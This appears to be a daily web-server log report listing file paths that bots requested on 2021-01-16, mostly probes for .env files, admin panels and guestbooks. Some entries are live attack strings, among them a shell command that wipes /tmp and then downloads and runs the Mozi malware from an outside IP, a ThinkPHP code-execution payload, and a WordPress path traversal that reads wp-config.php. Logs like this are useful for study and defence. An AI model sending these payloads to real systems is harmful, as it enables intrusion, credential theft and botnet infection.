File Access Bruteforce Attempts for 2021-01-16

Share on:

Last Updated: 21:01 GMT+8

  • .env
  • .git/HEAD
  • 14.146.94.86/
  • 187.157.115.238%20:%20GESTION_DE_DIRECCIONAMIENTO_UNINET/
  • 37.152.186.65/
  • 8
  • 92.0.202
  • CGI/guestbook?page=1
  • CVE-2003-0421/
  • CVE-2004-1943/
  • CVE-2008-1408/
  • Guestbook.php
  • HNAP1
  • TP/html/public/index.php
  • TP/index.php
  • TP/public/index.php
  • YaBB.cgi
  • actuator/health
  • admin/.env
  • album.cgi
  • api/.env
  • apple-touch-icon.png
  • apps/guestbook
  • aska.cgi
  • asset-manifest.json
  • assets/css/fa.min.css
  • assets/css/main.css
  • assets/fonts/FiraCode-Regular.woff
  • assets/fonts/fontawesome-webfont.ttf?v=4.7.0
  • assets/fonts/fontawesome-webfont.woff2?v=4.7.0
  • assets/fonts/fontawesome-webfont.woff?v=4.7.0
  • assets/img/favicon.ico?
  • atom.xml
  • bbs.cgi
  • blog/.env
  • book.php
  • config/getuser?index=0
  • console/
  • default.asp
  • elrekt.php
  • evox/about
  • favicon.ico
  • feed
  • feed/
  • feeds
  • feeds/
  • g_book.cgi
  • gaestebuch.php
  • gastenboek.php
  • gb.php
  • guestbook
  • guestbook.html
  • guestbook.php
  • home.php
  • html/public/index.php
  • index.atom
  • index.php
  • index.php/component/users/?view=registration
  • index.php?act=dispMemberLoginForm
  • index.php?option=com_user&task=register
  • index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP21
  • index.rdf
  • index.rss
  • index.xml
  • index2.php?cek
  • index2.php?info
  • jamesbrine.com.au.sql
  • jamesbrine.sql
  • jax_guestbook.php
  • jenkins/login
  • laravel/.env
  • light.cgi
  • login
  • manager/html
  • member/
  • modules.php?name=Your_Account
  • nmaplowercheck1610743542
  • phishingdomains-2020-11-16/
  • phishingdomains-2020-12-13/
  • port4043/
  • port42913/
  • port44335/
  • public/.env
  • public/Index2.php?cek
  • public/index.php
  • public/index2.php?info
  • rss.xml
  • sbb.cgi
  • scarbook.php
  • seo-joy.cgi
  • shell?cd+/tmp;rm+-rf+*;wget+http://202.164.139.59:51976/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
  • shop/.env
  • sites/.env
  • solr/admin/info/system?wt=json
  • sunbbs.cgi?mode=form
  • system/.env
  • test/.env
  • thinkphp/html/public/index.php
  • vendor/.env
  • vendor/phpunit/phpunit/LICENSE
  • vendor/phpunit/phpunit/src/Util/PHP/Index.php?cek
  • vendor/phpunit/phpunit/src/Util/PHP/PHPunitProcess.php?cek
  • vendor/phpunit/phpunit/src/Util/PHP/PhpunitProcess.php?info
  • vendor/phpunit/phpunit/src/Util/PHP/SpammerVip.php
  • vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php
  • vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot_.php
  • vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • vendor/phpunit/phpunit/src/Util/PHP/index.php?info
  • vendor/phpunit/phpunit/src/Util/PHP/pct.php
  • wordpress/wp-admin/
  • wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • wp-content/plugins/apikey/apikey.php
  • wp-content/plugins/apikey/cursed.php
  • wp-content/plugins/downloads-manager/img/unlock.gif
  • wp-content/plugins/ioptimization/IOptimize.php?rchk
  • wp-content/plugins/wp-file-manager/readme.txt
  • wp-includes/css/css.php
  • wp-includes/fonts/css.php
  • wp-login.php
  • wp/wp-admin/
  • yabb.pl
  • yapgb.php
  • yybbs.cgi